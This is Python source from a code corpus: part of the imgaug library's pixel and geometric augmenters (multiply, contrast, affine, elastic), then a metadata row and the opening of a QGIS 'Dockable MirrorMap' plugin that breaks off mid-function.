nb_images = len(images)
seeds = random_state.randint(0, 10**6, (nb_images,))
for i in sm.xrange(nb_images):
seed = seeds[i]
image = images[i].astype(np.int32)
height, width, nb_channels = image.shape
rs_image = ia.new_random_state(seed)
per_channel = self.per_channel.draw_sample(random_state=rs_image)
if per_channel == 1:
samples = self.value.draw_samples((height, width, nb_channels), random_state=rs_image)
else:
samples = self.value.draw_samples((height, width, 1), random_state=rs_image)
samples = np.tile(samples, (1, 1, nb_channels))
after_add = image + samples
np.clip(after_add, 0, 255, out=after_add)
result[i] = after_add.astype(np.uint8)
return result
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
return keypoints_on_images
def get_parameters(self):
return [self.value]
class Multiply(Augmenter):
"""Augmenter that Multiplies a value elementwise to the pixels of the image
Parameters
----------
value : integer, iterable of len 2, StochasticParameter
value to be added to the pixels/elements
per_channel : boolean, optional(default=False)
apply transform in a per channel manner
name : string, optional(default=None)
name of the instance
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
everytime
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(self, mul=1.0, per_channel=False, name=None,
deterministic=False, random_state=None):
super(Multiply, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if ia.is_single_number(mul):
assert mul >= 0.0, "Expected multiplier to have range [0, inf), got value %.4f." % (mul,)
self.mul = Deterministic(mul)
elif ia.is_iterable(mul):
assert len(mul) == 2, "Expected tuple/list with 2 entries, got %d entries." % (len(mul),)
self.mul = Uniform(mul[0], mul[1])
elif isinstance(mul, StochasticParameter):
self.mul = mul
else:
raise Exception("Expected float or int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(mul),))
if per_channel in [True, False, 0, 1, 0.0, 1.0]:
self.per_channel = Deterministic(int(per_channel))
elif ia.is_single_number(per_channel):
assert 0 <= per_channel <= 1.0
self.per_channel = Binomial(per_channel)
else:
raise Exception("Expected per_channel to be boolean or number or StochasticParameter")
def _augment_images(self, images, random_state, parents, hooks):
result = images
nb_images = len(images)
seeds = random_state.randint(0, 10**6, (nb_images,))
for i in sm.xrange(nb_images):
image = images[i].astype(np.float32)
rs_image = ia.new_random_state(seeds[i])
per_channel = self.per_channel.draw_sample(random_state=rs_image)
if per_channel == 1:
nb_channels = image.shape[2]
samples = self.mul.draw_samples((nb_channels,), random_state=rs_image)
for c, sample in enumerate(samples):
assert sample >= 0
image[..., c] *= sample
np.clip(image, 0, 255, out=image)
result[i] = image.astype(np.uint8)
else:
sample = self.mul.draw_sample(random_state=rs_image)
assert sample >= 0
image *= sample
np.clip(image, 0, 255, out=image)
result[i] = image.astype(np.uint8)
return result
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
return keypoints_on_images
def get_parameters(self):
return [self.mul]
# TODO tests
class MultiplyElementwise(Augmenter):
# TODO
def __init__(self, mul=1.0, per_channel=False, name=None, deterministic=False, random_state=None):
super(MultiplyElementwise, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if ia.is_single_number(mul):
assert mul >= 0.0, "Expected multiplier to have range [0, inf), got value %.4f." % (mul,)
self.mul = Deterministic(mul)
elif ia.is_iterable(mul):
assert len(mul) == 2, "Expected tuple/list with 2 entries, got %d entries." % (str(len(mul)),)
self.mul = Uniform(mul[0], mul[1])
elif isinstance(mul, StochasticParameter):
self.mul = mul
else:
raise Exception("Expected float or int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(mul),))
if per_channel in [True, False, 0, 1, 0.0, 1.0]:
self.per_channel = Deterministic(int(per_channel))
elif ia.is_single_number(per_channel):
assert 0 <= per_channel <= 1.0
self.per_channel = Binomial(per_channel)
else:
raise Exception("Expected per_channel to be boolean or number or StochasticParameter")
def _augment_images(self, images, random_state, parents, hooks):
result = images
nb_images = len(images)
seeds = random_state.randint(0, 10**6, (nb_images,))
for i in sm.xrange(nb_images):
seed = seeds[i]
image = images[i].astype(np.float32)
height, width, nb_channels = image.shape
rs_image = ia.new_random_state(seed)
per_channel = self.per_channel.draw_sample(random_state=rs_image)
if per_channel == 1:
samples = self.mul.draw_samples((height, width, nb_channels), random_state=rs_image)
else:
samples = self.mul.draw_samples((height, width, 1), random_state=rs_image)
samples = np.tile(samples, (1, 1, nb_channels))
after_multiply = image * samples
np.clip(after_multiply, 0, 255, out=after_multiply)
result[i] = after_multiply.astype(np.uint8)
return result
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
return keypoints_on_images
def get_parameters(self):
return [self.mul]
# TODO tests
class ContrastNormalization(Augmenter):
"""Augmenter class for ContrastNormalization
Parameters
----------
alpha : float, iterable of len 2, StochasticParameter
Normalization parameter that governs the contrast ratio
of the resulting image
per_channel : boolean, optional(default=False)
apply transform in a per channel manner
name : string, optional(default=None)
name of the instance
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
everytime
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(self, alpha=1.0, per_channel=False, name=None, deterministic=False, random_state=None):
super(ContrastNormalization, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if ia.is_single_number(alpha):
assert alpha >= 0.0, "Expected alpha to have range (0, inf), got value %.4f." % (alpha,)
self.alpha = Deterministic(alpha)
elif ia.is_iterable(alpha):
assert len(alpha) == 2, "Expected tuple/list with 2 entries, got %d entries." % (str(len(alpha)),)
self.alpha = Uniform(alpha[0], alpha[1])
elif isinstance(alpha, StochasticParameter):
self.alpha = alpha
else:
raise Exception("Expected float or int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(alpha),))
if per_channel in [True, False, 0, 1, 0.0, 1.0]:
self.per_channel = Deterministic(int(per_channel))
elif ia.is_single_number(per_channel):
assert 0 <= per_channel <= 1.0
self.per_channel = Binomial(per_channel)
else:
raise Exception("Expected per_channel to be boolean or number or StochasticParameter")
def _augment_images(self, images, random_state, parents, hooks):
result = images
nb_images = len(images)
seeds = random_state.randint(0, 10**6, (nb_images,))
for i in sm.xrange(nb_images):
image = images[i].astype(np.float32)
rs_image = ia.new_random_state(seeds[i])
per_channel = self.per_channel.draw_sample(random_state=rs_image)
if per_channel:
nb_channels = images[i].shape[2]
alphas = self.alpha.draw_samples((nb_channels,), random_state=rs_image)
for c, alpha in enumerate(alphas):
image[..., c] = alpha * (image[..., c] - 128) + 128
else:
alpha = self.alpha.draw_sample(random_state=rs_image)
image = alpha * (image - 128) + 128
np.clip(image, 0, 255, out=image)
result[i] = image.astype(np.uint8)
return result
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
return keypoints_on_images
def get_parameters(self):
return [self.alpha]
class Affine(Augmenter):
"""Augmenter for Affine Transformations
An Affine Transformation is a linear mapping that preserves points,
straight lines and planes
Parameters
----------
scale : # TODO
translate_percent : # TODO
translate_px : # TODO
rotate : # TODO
shear : # TODO
order : # TODO
cval : # TODO
mode : # TODO
per_channel : boolean, optional(default=False)
apply transform in a per channel manner
name : string, optional(default=None)
name of the instance
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
everytime
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(self, scale=1.0, translate_percent=None, translate_px=None,
rotate=0.0, shear=0.0, order=1, cval=0.0, mode="constant",
name=None, deterministic=False, random_state=None):
super(Affine, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
# Peformance:
# 1.0x order 0
# 1.5x order 1
# 3.0x order 3
# 30.0x order 4
# 60.0x order 5
# measurement based on 256x256x3 batches, difference is smaller
# on smaller images (seems to grow more like exponentially with image
# size)
if order == ia.ALL:
# self.order = DiscreteUniform(0, 5)
self.order = Choice([0, 1, 3, 4, 5]) # dont use order=2 (bi-quadratic) because that is apparently currently not recommended (and throws a warning)
elif ia.is_single_integer(order):
assert 0 <= order <= 5, "Expected order's integer value to be in range 0 <= x <= 5, got %d." % (order,)
self.order = Deterministic(order)
elif isinstance(order, list):
assert all([ia.is_single_integer(val) for val in order]), "Expected order list to only contain integers, got types %s." % (str([type(val) for val in order]),)
assert all([0 <= val <= 5 for val in order]), "Expected all of order's integer values to be in range 0 <= x <= 5, got %s." % (str(order),)
self.order = Choice(order)
elif isinstance(order, StochasticParameter):
self.order = order
else:
raise Exception("Expected order to be imgaug.ALL, int or StochasticParameter, got %s." % (type(order),))
if cval == ia.ALL:
self.cval = Uniform(0, 1.0)
elif ia.is_single_number(cval):
assert 0 <= cval <= 1.0
self.cval = Deterministic(cval)
elif ia.is_iterable(cval):
assert len(cval) == 2
assert 0 <= cval[0] <= 1.0
assert 0 <= cval[1] <= 1.0
self.cval = Uniform(cval[0], cval[1])
elif isinstance(cval, StochasticParameter):
self.cval = cval
else:
raise Exception("Expected cval to be imgaug.ALL, int, float or StochasticParameter, got %s." % (type(cval),))
# constant, edge, symmetric, reflect, wrap
if mode == ia.ALL:
self.mode = Choice(["constant", "edge", "symmetric", "reflect", "wrap"])
elif ia.is_string(mode):
self.mode = Deterministic(mode)
elif isinstance(mode, list):
assert all([ia.is_string(val) for val in mode])
self.mode = Choice(mode)
elif isinstance(mode, StochasticParameter):
self.mode = mode
else:
raise Exception("Expected mode to be imgaug.ALL, a string, a list of strings or StochasticParameter, got %s." % (type(mode),))
# scale
# float | (float, float) | [float, float] | StochasticParameter
def scale_handle_param(param, allow_dict):
if isinstance(param, StochasticParameter):
return param
elif ia.is_single_number(param):
assert param > 0.0, "Expected scale to have range (0, inf), got value %.4f. Note: The value to _not_ change the scale of images is 1.0, not 0.0." % (param,)
return Deterministic(param)
elif ia.is_iterable(param) and not isinstance(param, dict):
assert len(param) == 2, "Expected scale tuple/list with 2 entries, got %d entries." % (str(len(param)),)
assert param[0] > 0.0 and param[1] > 0.0, "Expected scale tuple/list to have values in range (0, inf), got values %.4f and %.4f. Note: The value to _not_ change the scale of images is 1.0, not 0.0." % (param[0], param[1])
return Uniform(param[0], param[1])
elif allow_dict and isinstance(param, dict):
assert "x" in param or "y" in param
x = param.get("x")
y = param.get("y")
x = x if x is not None else 1.0
y = y if y is not None else 1.0
return (scale_handle_param(x, False), scale_handle_param(y, False))
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(param),))
self.scale = scale_handle_param(scale, True)
# translate
if translate_percent is None and translate_px is None:
translate_px = 0
assert translate_percent is None or translate_px is None
if translate_percent is not None:
# translate by percent
def translate_handle_param(param, allow_dict):
if ia.is_single_number(param):
return Deterministic(float(param))
elif ia.is_iterable(param) and not isinstance(param, dict):
assert len(param) == 2, "Expected translate_percent tuple/list with 2 entries, got %d entries." % (str(len(param)),)
all_numbers = all([ia.is_single_number(p) for p in param])
assert all_numbers, "Expected translate_percent tuple/list to contain only numbers, got types %s." % (str([type(p) for p in param]),)
#assert param[0] > 0.0 and param[1] > 0.0, "Expected translate_percent tuple/list to have values in range (0, inf), got values %.4f and %.4f." % (param[0], param[1])
return Uniform(param[0], param[1])
elif allow_dict and isinstance(param, dict):
assert "x" in param or "y" in param
x = param.get("x")
y = param.get("y")
x = x if x is not None else 0
y = y if y is not None else 0
return (translate_handle_param(x, False), translate_handle_param(y, False))
elif isinstance(param, StochasticParameter):
return param
else:
raise Exception("Expected float, int or tuple/list with 2 entries of both floats or ints or StochasticParameter. Got %s." % (type(param),))
self.translate = translate_handle_param(translate_percent, True)
else:
# translate by pixels
def translate_handle_param(param, allow_dict):
if ia.is_single_integer(param):
return Deterministic(param)
elif ia.is_iterable(param) and not isinstance(param, dict):
assert len(param) == 2, "Expected translate_px tuple/list with 2 entries, got %d entries." % (str(len(param)),)
all_integer = all([ia.is_single_integer(p) for p in param])
assert all_integer, "Expected translate_px tuple/list to contain only integers, got types %s." % (str([type(p) for p in param]),)
return DiscreteUniform(param[0], param[1])
elif allow_dict and isinstance(param, dict):
assert "x" in param or "y" in param
x = param.get("x")
y = param.get("y")
x = x if x is not None else 0
y = y if y is not None else 0
return (translate_handle_param(x, False), translate_handle_param(y, False))
elif isinstance(param, StochasticParameter):
return param
else:
raise Exception("Expected int or tuple/list with 2 ints or StochasticParameter. Got %s." % (type(param),))
self.translate = translate_handle_param(translate_px, True)
# rotate
# StochasticParameter | float | int | (float or int, float or int) | [float or int, float or int]
if isinstance(rotate, StochasticParameter):
self.rotate = rotate
elif ia.is_single_number(rotate):
self.rotate = Deterministic(rotate)
elif ia.is_iterable(rotate):
assert len(rotate) == 2, "Expected rotate tuple/list with 2 entries, got %d entries." % (str(len(rotate)),)
assert all([ia.is_single_number(val) for val in rotate]), "Expected floats/ints in rotate tuple/list"
self.rotate = Uniform(rotate[0], rotate[1])
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(rotate),))
# shear
# StochasticParameter | float | int | (float or int, float or int) | [float or int, float or int]
if isinstance(shear, StochasticParameter):
self.shear = shear
elif ia.is_single_number(shear):
self.shear = Deterministic(shear)
elif ia.is_iterable(shear):
assert len(shear) == 2, "Expected rotate tuple/list with 2 entries, got %d entries." % (str(len(shear)),)
assert all([ia.is_single_number(val) for val in shear]), "Expected floats/ints in shear tuple/list."
self.shear = Uniform(shear[0], shear[1])
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(shear),))
def _augment_images(self, images, random_state, parents, hooks):
# skimage's warp() converts to 0-1 range, so we use float here and then convert
# at the end
# float images are expected by skimage's warp() to be in range 0-1, so we divide by 255
if isinstance(images, list):
result = [image.astype(np.float32, copy=False) for image in images]
result = [image / 255.0 for image in images]
else:
result = images.astype(np.float32, copy=False)
result = result / 255.0
nb_images = len(images)
scale_samples, translate_samples, rotate_samples, shear_samples, cval_samples, mode_samples, order_samples = self._draw_samples(nb_images, random_state)
for i in sm.xrange(nb_images):
height, width = result[i].shape[0], result[i].shape[1]
shift_x = int(width / 2.0)
shift_y = int(height / 2.0)
scale_x, scale_y = scale_samples[0][i], scale_samples[1][i]
translate_x, translate_y = translate_samples[0][i], translate_samples[1][i]
#assert isinstance(translate_x, (float, int))
#assert isinstance(translate_y, (float, int))
if ia.is_single_float(translate_y):
translate_y_px = int(round(translate_y * images[i].shape[0]))
else:
translate_y_px = translate_y
if ia.is_single_float(translate_x):
translate_x_px = int(round(translate_x * images[i].shape[1]))
else:
translate_x_px = translate_x
rotate = rotate_samples[i]
shear = shear_samples[i]
cval = cval_samples[i]
mode = mode_samples[i]
order = order_samples[i]
if scale_x != 1.0 or scale_y != 1.0 or translate_x_px != 0 or translate_y_px != 0 or rotate != 0 or shear != 0:
matrix_to_topleft = tf.SimilarityTransform(translation=[-shift_x, -shift_y])
matrix_transforms = tf.AffineTransform(
scale=(scale_x, scale_y),
translation=(translate_x_px, translate_y_px),
rotation=math.radians(rotate),
shear=math.radians(shear)
)
matrix_to_center = tf.SimilarityTransform(translation=[shift_x, shift_y])
matrix = (matrix_to_topleft + matrix_transforms + matrix_to_center)
result[i] = tf.warp(
result[i],
matrix.inverse,
order=order,
mode=mode,
cval=cval
)
result[i] *= 255.0
np.clip(result[i], 0, 255, out=result[i])
if isinstance(images, list):
result = [image.astype(np.uint8, copy=False) for image in result]
else:
result = result.astype(np.uint8, copy=False)
return result
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
result = []
nb_images = len(keypoints_on_images)
scale_samples, translate_samples, rotate_samples, shear_samples, cval_samples, mode_samples, order_samples = self._draw_samples(nb_images, random_state)
for i, keypoints_on_image in enumerate(keypoints_on_images):
height, width = keypoints_on_image.height, keypoints_on_image.width
shift_x = int(width / 2.0)
shift_y = int(height / 2.0)
scale_x, scale_y = scale_samples[0][i], scale_samples[1][i]
translate_x, translate_y = translate_samples[0][i], translate_samples[1][i]
#assert isinstance(translate_x, (float, int))
#assert isinstance(translate_y, (float, int))
if ia.is_single_float(translate_y):
translate_y_px = int(round(translate_y * keypoints_on_image.shape[0]))
else:
translate_y_px = translate_y
if ia.is_single_float(translate_x):
translate_x_px = int(round(translate_x * keypoints_on_image.shape[1]))
else:
translate_x_px = translate_x
rotate = rotate_samples[i]
shear = shear_samples[i]
#cval = cval_samples[i]
#mode = mode_samples[i]
#order = order_samples[i]
if scale_x != 1.0 or scale_y != 1.0 or translate_x_px != 0 or translate_y_px != 0 or rotate != 0 or shear != 0:
matrix_to_topleft = tf.SimilarityTransform(translation=[-shift_x, -shift_y])
matrix_transforms = tf.AffineTransform(
scale=(scale_x, scale_y),
translation=(translate_x_px, translate_y_px),
rotation=math.radians(rotate),
shear=math.radians(shear)
)
matrix_to_center = tf.SimilarityTransform(translation=[shift_x, shift_y])
matrix = (matrix_to_topleft + matrix_transforms + matrix_to_center)
coords = keypoints_on_image.get_coords_array()
#print("coords", coords)
#print("matrix", matrix.params)
coords_aug = tf.matrix_transform(coords, matrix.params)
#print("coords before", coords)
#print("coordsa ftre", coords_aug, np.around(coords_aug).astype(np.int32))
result.append(ia.KeypointsOnImage.from_coords_array(np.around(coords_aug).astype(np.int32), shape=keypoints_on_image.shape))
else:
result.append(keypoints_on_image)
return result
def get_parameters(self):
return [self.scale, self.translate, self.rotate, self.shear]
def _draw_samples(self, nb_samples, random_state):
seed = random_state.randint(0, 10**6, 1)[0]
if isinstance(self.scale, tuple):
scale_samples = (
self.scale[0].draw_samples((nb_samples,), random_state=ia.new_random_state(seed + 10)),
self.scale[1].draw_samples((nb_samples,), random_state=ia.new_random_state(seed + 20)),
)
else:
scale_samples = self.scale.draw_samples((nb_samples,), random_state=ia.new_random_state(seed + 30))
scale_samples = (scale_samples, scale_samples)
if isinstance(self.translate, tuple):
translate_samples = (
self.translate[0].draw_samples((nb_samples,), random_state=ia.new_random_state(seed + 40)),
self.translate[1].draw_samples((nb_samples,), random_state=ia.new_random_state(seed + 50)),
)
else:
translate_samples = self.translate.draw_samples((nb_samples,), random_state=ia.new_random_state(seed + 60))
translate_samples = (translate_samples, translate_samples)
assert translate_samples[0].dtype in [np.int32, np.int64, np.float32, np.float64]
assert translate_samples[1].dtype in [np.int32, np.int64, np.float32, np.float64]
rotate_samples = self.rotate.draw_samples((nb_samples,), random_state=ia.new_random_state(seed + 70))
shear_samples = self.shear.draw_samples((nb_samples,), random_state=ia.new_random_state(seed + 80))
cval_samples = self.cval.draw_samples((nb_samples,), random_state=ia.new_random_state(seed + 90))
mode_samples = self.mode.draw_samples((nb_samples,), random_state=ia.new_random_state(seed + 100))
order_samples = self.order.draw_samples((nb_samples,), random_state=ia.new_random_state(seed + 110))
return scale_samples, translate_samples, rotate_samples, shear_samples, cval_samples, mode_samples, order_samples
# code partially from
# https://gist.github.com/chsasank/4d8f68caf01f041a6453e67fb30f8f5a
class ElasticTransformation(Augmenter):
"""Augmenter class for ElasticTransformations
Elastic Transformations are transformations that allow non-rigid
transformations of images. In a sense, Elastic Transformations are opposite
of Affine Transforms, since Elastic Transformations can effect the lines,
planes and points of an image.
Elastic Transformations can be used to create new, unseen images from given
images, and are used extensively in Machine Learning/Pattern Recognition.
Parameters
----------
alpha : float, iterable of len 2, StochasticParameter
# TODO
sigma : float, iterable of len 2, StochasticParameter
# TODO
per_channel : boolean, optional(default=False)
apply transform in a per channel manner
name : string, optional(default=None)
name of the instance
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
everytime
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(self, alpha=0, sigma=0, name=None, deterministic=False,
random_state=None):
super(ElasticTransformation, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if ia.is_single_number(alpha):
assert alpha >= 0.0, "Expected alpha to have range [0, inf), got value %.4f." % (alpha,)
self.alpha = Deterministic(alpha)
elif ia.is_iterable(alpha):
assert len(alpha) == 2, "Expected tuple/list with 2 entries, got %d entries." % (str(len(alpha)),)
self.alpha = Uniform(alpha[0], alpha[1])
elif isinstance(alpha, StochasticParameter):
self.alpha = alpha
else:
raise Exception("Expected float or int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(alpha),))
if ia.is_single_number(sigma):
assert sigma >= 0.0, "Expected sigma to have range [0, inf), got value %.4f." % (sigma,)
self.sigma = Deterministic(sigma)
elif ia.is_iterable(sigma):
assert len(sigma) == 2, "Expected tuple/list with 2 entries, got %d entries." % (str(len(sigma)),)
self.sigma = Uniform(sigma[0], sigma[1])
elif isinstance(sigma, StochasticParameter):
self.sigma = sigma
else:
raise Exception("Expected float or int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(sigma),))
def _augment_images(self, images, random_state, parents, hooks):
result = images
nb_images = len(images)
seeds = ia.copy_random_state(random_state).randint(0, 10**6, (nb_images,))
alphas = self.alpha.draw_samples((nb_images,), random_state=ia.copy_random_state(random_state))
sigmas = self.sigma.draw_samples((nb_images,), random_state=ia.copy_random_state(random_state))
for i in sm.xrange(nb_images):
image = images[i]
image_first_channel = np.squeeze(image[..., 0])
indices_x, indices_y = ElasticTransformation.generate_indices(image_first_channel.shape, alpha=alphas[i], sigma=sigmas[i], random_state=ia.new_random_state(seeds[i]))
result[i] = ElasticTransformation.map_coordinates(images[i], indices_x, indices_y)
return result
"""
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
# TODO do keypoints even have to be augmented for elastic transformations?
# TODO this transforms keypoints to images, augments the images, then transforms
# back to keypoints - inefficient and keypoints that get outside of the images
# cannot be recovered
result = []
nb_images = len(keypoints_on_images)
seeds = ia.copy_random_state(random_state).randint(0, 10**6, (nb_images,))
alphas = self.alpha.draw_samples((nb_images,), random_state=ia.copy_random_state(random_state))
sigmas = self.sigma.draw_samples((nb_images,), random_state=ia.copy_random_state(random_state))
for i, keypoints_on_image in enumerate(keypoints_on_images):
indices_x, indices_y = ElasticTransformation.generate_indices(keypoints_on_image.shape[0:2], alpha=alphas[i], sigma=sigmas[i], random_state=ia.new_random_state(seeds[i]))
keypoint_image = keypoints_on_image.to_keypoint_image()
keypoint_image_aug = ElasticTransformation.map_coordinates(keypoint_image, indices_x, indices_y)
keypoints_aug = ia.KeypointsOnImage.from_keypoint_image(keypoint_image_aug)
result.append(keypoints_aug)
return result
"""
# no transformation of keypoints for this currently,
# it seems like this is the more appropiate choice overall for this augmentation
# technique
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
return keypoints_on_images
def get_parameters(self):
return [self.alpha, self.sigma]
@staticmethod
def generate_indices(shape, alpha, sigma, random_state):
"""Elastic deformation of images as described in [Simard2003]_.
.. [Simard2003] Simard, Steinkraus and Platt, "Best Practices for
Convolutional Neural Networks applied to Visual Document Analysis", in
Proc. of the International Conference on Document Analysis and
Recognition, 2003.
"""
assert len(shape) == 2
dx = ndimage.gaussian_filter((random_state.rand(*shape) * 2 - 1), sigma, mode="constant", cval=0) * alpha
dy = ndimage.gaussian_filter((random_state.rand(*shape) * 2 - 1), sigma, mode="constant", cval=0) * alpha
x, y = np.meshgrid(np.arange(shape[0]), np.arange(shape[1]), indexing='ij')
return np.reshape(x+dx, (-1, 1)), np.reshape(y+dy, (-1, 1))
@staticmethod
def map_coordinates(image, indices_x, indices_y):
assert len(image.shape) == 3
result = np.copy(image)
height, width = image.shape[0:2]
for c in sm.xrange(image.shape[2]):
remapped_flat = ndimage.interpolation.map_coordinates(image[..., c], (indices_x, indices_y), order=1)
remapped = remapped_flat.reshape((height, width))
result[..., c] = remapped
return result
|
CKboss/TheBauble
|
Tensorflow/CNN/ResNet/imgaug/augmenters.py
|
Python
|
gpl-3.0
| 129,266 | 0.003458 |
# -*- coding: utf-8 -*-
"""
/***************************************************************************
Name : Dockable MirrorMap
Description : Creates a dockable map canvas
Date : February 1, 2011
copyright : (C) 2011 by Giuseppe Sucameli (Faunalia)
email : brush.tyler@gmail.com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from qgis.core import *
from qgis.gui import *
import resources_rc
class DockableMirrorMapPlugin:
def __init__(self, iface):
# Save a reference to the QGIS iface
self.iface = iface
def initGui(self):
self.dockableMirrors = []
self.lastDockableMirror = 0
self.dockableAction = QAction(QIcon(":/plugins/DockableMirrorMap/icons/dockablemirrormap.png"), "Dockable MirrorMap", self.iface.mainWindow())
QObject.connect(self.dockableAction, SIGNAL("triggered()"), self.runDockableMirror)
self.aboutAction = QAction(QIcon(":/plugins/DockableMirrorMap/icons/about.png"), "About", self.iface.mainWindow())
QObject.connect(self.aboutAction, SIGNAL("triggered()"), self.about)
# Add to the plugin menu and toolbar
self.iface.addPluginToMenu("Dockable MirrorMap", self.dockableAction)
self.iface.addPluginToMenu("Dockable MirrorMap", self.aboutAction)
self.iface.addToolBarIcon(self.dockableAction)
QObject.connect(self.iface, SIGNAL("projectRead()"), self.onProjectLoaded)
QObject.connect(QgsProject.instance(), SIGNAL("writeProject(QDomDocument &)"), self.onWriteProject)
def unload(self):
QObject.disconnect(self.iface, SIGNAL("projectRead()"), self.onProjectLoaded)
QObject.disconnect(QgsProject.instance(), SIGNAL("writeProject(QDomDocument &)"), self.onWriteProject)
self.removeDockableMirrors()
# Remove the plugin
self.iface.removePluginMenu("Dockable MirrorMap",self.dockableAction)
self.iface.removePluginMenu("Dockable MirrorMap",self.aboutAction)
self.iface.removeToolBarIcon(self.dockableAction)
def about(self):
from DlgAbout import DlgAbout
DlgAbout(self.iface.mainWindow()).exec_()
def removeDockableMirrors(self):
for d in list(self.dockableMirrors):
d.close()
self.dockableMirrors = []
self.lastDockableMirror = 0
def runDockableMirror(self):
from dockableMirrorMap import DockableMirrorMap
wdg = DockableMirrorMap(self.iface.mainWindow(), self.iface)
minsize = wdg.minimumSize()
maxsize = wdg.maximumSize()
self.setupDockWidget(wdg)
self.addDockWidget(wdg)
wdg.setMinimumSize(minsize)
wdg.setMaximumSize(maxsize)
if wdg.isFloating():
wdg.move(50, 50) # move the widget to the center
def setupDockWidget(self, wdg):
othersize = QGridLayout().verticalSpacing()
if len(self.dockableMirrors) <= 0:
width = self.iface.mapCanvas().size().width()/2 - othersize
wdg.setLocation( Qt.RightDockWidgetArea )
wdg.setMinimumWidth( width )
wdg.setMaximumWidth( width )
elif len(self.dockableMirrors) == 1:
height = self.dockableMirrors[0].size().height()/2 - othersize/2
wdg.setLocation( Qt.RightDockWidgetArea )
wdg.setMinimumHeight( height )
wdg.setMaximumHeight( height )
elif len(self.dockableMirrors) == 2:
height = self.iface.mapCanvas().size().height()/2 - othersize/2
wdg.setLocation( Qt.BottomDockWidgetArea )
wdg.setMinimumHeight( height )
wdg.setMaximumHeight( height )
else:
wdg.setLocation( Qt.BottomDockWidgetArea )
wdg.setFloating( True )
def addDockWidget(self, wdg, position=None):
if position == None:
position = wdg.getLocation()
else:
wdg.setLocation( position )
mapCanvas = self.iface.mapCanvas()
oldSize = mapCanvas.size()
prevFlag = mapCanvas.renderFlag()
mapCanvas.setRenderFlag(False)
self.iface.addDockWidget(position, wdg)
wdg.setNumber( self.lastDockableMirror )
self.lastDockableMirror = self.lastDockableMirror+1
self.dockableMirrors.append( wdg )
QObject.connect(wdg, SIGNAL( "closed(PyQt_PyObject)" ), self.onCloseDockableMirror)
newSize = mapCanvas.size()
if newSize != oldSize:
# trick: update the canvas size
mapCanvas.resize(newSize.width() - 1, newSize.height())
mapCanvas.setRenderFlag(prevFlag)
mapCanvas.resize(newSize)
else:
mapCanvas.setRenderFlag(prevFlag)
def onCloseDockableMirror(self, wdg):
if self.dockableMirrors.count( wdg ) > 0:
self.dockableMirrors.remove( wdg )
if len(self.dockableMirrors) <= 0:
self.lastDockableMirror = 0
def onWriteProject(self, domproject):
if len(self.dockableMirrors) <= 0:
return
QgsProject.instance().writeEntry( "DockableMirrorMap", "/numMirrors", len(self.dockableMirrors) )
for i, dockwidget in enumerate(self.dockableMirrors):
# save position and geometry
floating = dockwidget.isFloating()
QgsProject.instance().writeEntry( "DockableMirrorMap", "/mirror%s/floating" % i, floating )
if floating:
position = "%s %s" % (dockwidget.pos().x(), dockwidget.pos().y())
else:
position = u"%s" % dockwidget.getLocation()
QgsProject.instance().writeEntry( "DockableMirrorMap", "/mirror%s/position" % i, str(position) )
size = "%s %s" % (dockwidget.size().width(), dockwidget.size().height())
QgsProject.instance().writeEntry( "DockableMirrorMap", "/mirror%s/size" % i, str(size) )
# save the layer list
layerIds = dockwidget.getMirror().getLayerSet()
QgsProject.instance().writeEntry( "DockableMirrorMap", "/mirror%s/layers" % i, layerIds )
scaleFactor = dockwidget.getMirror().scaleFactor.value()
QgsProject.instance().writeEntryDouble("DockableMirrorMap", "/mirror%s/scaleFactor" % i, scaleFactor)
def onProjectLoaded(self):
# restore mirrors?
num, ok = QgsProject.instance().readNumEntry("DockableMirrorMap", "/numMirrors")
if not ok or num <= 0:
return
# remove all mirrors
self.removeDockableMirrors()
mirror2lids = {}
# load mirrors
for i in range(num):
if num >= 2:
if i == 0:
prevFlag = self.iface.mapCanvas().renderFlag()
self.iface.mapCanvas().setRenderFlag(False)
elif i == num-1:
